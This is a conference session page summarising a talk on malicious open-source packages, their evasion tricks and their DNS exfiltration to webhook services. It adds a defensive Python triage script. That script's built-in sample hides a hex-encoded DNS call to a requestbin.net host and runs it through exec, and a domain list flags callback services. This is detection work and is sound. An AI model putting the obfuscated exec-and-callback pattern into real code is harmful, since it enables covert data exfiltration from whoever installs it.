
Sponsored Session: Malicious Package Trends Compared With Malware Evolution

2022-06-22

Authors:   Daniel Elkabes


Summary

Malicious packages are a growing threat to organizations and open-source communities, costing billions of dollars in damages. Attackers use a range of techniques to exfiltrate private information and to evade detection. The community is exploring solutions such as SLSA and SBOMs to reduce the risk, but categorizing malicious packages remains a challenge.
  • Malicious packages are a significant threat, costing billions of dollars in damages
  • Attackers use techniques such as dependency hijacking, typosquatting, and brandjacking to get their code installed, then exfiltrate private information while evading detection
  • Solutions such as SLSA and SBOMs are being explored to reduce the risk of malicious packages
  • Categorizing malicious packages is still a challenge for the community
The speaker shared an example of a recent malicious package found in the wild that hid its payload inside Lorem Ipsum filler text and hex encoding to evade detection. The package exfiltrated private information via DNS lookups to webhooks hosted on pipedream.net and requestbin.net.
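The evasion pattern described above (readable code hidden as a hex string among Lorem Ipsum filler, then a call-out to a webhook service) is easy to triage statically. The following is an added example, not code from the talk or from the speaker's company: it decodes long hex runs in an install-time script, measures how much of the surrounding text is filler, and flags hostnames under the two callback services named in the talk. The sample script, the `0.5` filler threshold, the 16-byte minimum hex run and the word list are all constructed assumptions for this illustration.

```python
import re

# Callback services named in the talk's example; used here purely as string indicators.
EXFIL_DOMAINS = ("pipedream.net", "requestbin.net")

# A run of 16 or more bytes of contiguous hex is unusual in an install script
# (assumed threshold; tune per ecosystem).
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{2}){16,}(?![0-9a-fA-F])")

# Filler vocabulary (assumed short list; extend as needed).
LOREM_WORDS = frozenset(
    "lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod "
    "tempor incididunt ut labore et dolore magna aliqua".split()
)


def decode_hex_runs(text):
    """Decode every long hex run that yields readable ASCII; return [(hex, decoded)]."""
    found = []
    for m in HEX_RUN.finditer(text):
        raw = bytes.fromhex(m.group(0))
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue  # binary blob (e.g. a hash); not the text-in-hex trick we want
        if all(c.isprintable() or c in "\n\r\t" for c in decoded):
            found.append((m.group(0), decoded))
    return found


def filler_ratio(text):
    """Fraction of alphabetic tokens (hex runs removed first) that are Lorem Ipsum words."""
    words = re.findall(r"[a-z]+", HEX_RUN.sub(" ", text).lower())
    if not words:
        return 0.0
    return sum(w in LOREM_WORDS for w in words) / len(words)


def find_exfil_domains(text):
    """Hostnames under the known callback services, in plain or decoded text."""
    pattern = re.compile(r"[\w.-]*\.(?:" + "|".join(map(re.escape, EXFIL_DOMAINS)) + r")")
    return sorted(set(pattern.findall(text)))


def triage(script_text, filler_threshold=0.5):
    """Static triage of one install-time script; returns findings and a verdict.

    Any single reason marks the script suspicious: this is a cheap first-pass
    filter meant to feed human review, not a final classifier.
    """
    decoded = decode_hex_runs(script_text)
    decoded_text = "\n".join(d for _, d in decoded)
    domains = find_exfil_domains(script_text + "\n" + decoded_text)
    ratio = filler_ratio(script_text)
    reasons = []
    if decoded:
        reasons.append(f"{len(decoded)} hex-encoded text blob(s)")
    if domains:
        reasons.append("callback domain(s): " + ", ".join(domains))
    if ratio >= filler_threshold:
        reasons.append(f"{ratio:.0%} of words are Lorem Ipsum filler")
    return {
        "decoded": decoded,
        "domains": domains,
        "filler_ratio": ratio,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


# Constructed sample (not the package from the talk): a setup-time script whose
# real logic is a hex string buried under Lorem Ipsum comments.
PAYLOAD_HEX = "import socket; socket.gethostbyname('demo.requestbin.net')".encode().hex()
SAMPLE_SCRIPT = f"""
# Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor
# incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.
_d = '{PAYLOAD_HEX}'
exec(bytes.fromhex(_d))
"""

if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print("suspicious:", result["suspicious"])
    for reason in result["reasons"]:
        print(" -", reason)
    for _, decoded in result["decoded"]:
        print("decoded payload:", decoded)
```

The script never executes the decoded blob; it only inspects it. The hostname match runs over both the plain text and the decoded text, which is what catches the indicator here: `requestbin.net` does not appear anywhere in the file until the hex is decoded.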

Abstract

Malicious actors upload their packages to our community package managers on a daily basis. Not surprisingly, malware found in package managers often shares characteristics with malware found elsewhere in cyberspace, providing a valuable learning opportunity. Daniel will analyze those similarities and dig into the key differentiators of open-source-based malware. By comparing the latest tactics and techniques used in malicious packages with the overall evolution of general malware, he will forecast likely future developments in this area, conclude with a review of key tactics to combat this growing threat, and draw tactical lessons from security solutions built for general malware.
